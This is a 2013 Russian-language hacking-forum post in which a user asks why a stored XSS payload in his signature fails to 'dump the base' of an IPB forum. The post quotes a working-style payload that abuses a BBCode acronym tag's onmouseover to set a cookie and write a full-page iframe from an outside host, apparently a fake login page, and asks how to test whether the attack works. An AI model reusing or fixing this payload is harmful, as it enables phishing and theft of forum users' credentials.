Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация
Навигация
Zhyk.org LIVE! Реклама на Zhyk.org Правила Форума Награды и достижения Доска "почета"

Взлом базы с помощью фейка

-

Школа Читера

- Основы основ - начинаем писать статьи для начинающих с целью создания полноценного раздела

Ответ
 
Опции темы
Старый 28.06.2013, 06:37   #1
 Разведчик
Аватар для Freedoom88
 
Freedoom88 скоро будет известенFreedoom88 скоро будет известенFreedoom88 скоро будет известен
Регистрация: 06.04.2010
Сообщений: 12
Популярность: 202
Сказал(а) спасибо: 14
Поблагодарили 7 раз(а) в 6 сообщениях
Отправить сообщение для Freedoom88 с помощью ICQ Отправить сообщение для Freedoom88 с помощью Skype™
 
Question Взлом базы с помощью фейка

Доброго времени суток. Нарвался на тему 2010 года (by m0nk) http://zhyk.ru/forum/showthread.php?t=97765 Все вроде правильно сделал, но когда я пишу сообщение на форуме - то подписка выглядит как мне кажется не так как должна
Весь XSS код написан в моей подписке... Как должно быть в оригинале я не знаю даже. Скорее всего данный способ уже не рабочий, Но хотелось бы узнать у людей кто знает про данный способ - как должна выглядить моя подпись если бы способ был рабочий?

А вот сам XSS-код, может быть в нём самом есть ошибка?
Код:
[acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://krya-kyra.hut2.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]_]___________________________________________________________________________[/acronym]_[/acronym][/size]
[/COLOR]

И ещё - как узнать работает данный способ слива базы на форуме ibp или нет? Способ проверки имеется?
Изображения
Тип файла: jpg Безымянный.jpg (171.1 Кб, 24 просмотров)
________________
"Первый выстрел мой - и в цель!" В.Ф. Маргелов

Последний раз редактировалось Freedoom88; 28.06.2013 в 06:41.
  Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Развод донов с помощью программы фейка для рыбалки. smqkvova Архив 13 22.10.2010 17:38
Создание 2ух стопок на ПТС (с помощью фейка) Федя Подполье Lineage 2 (0 уровень) 9 12.07.2010 22:52

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 16:50.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net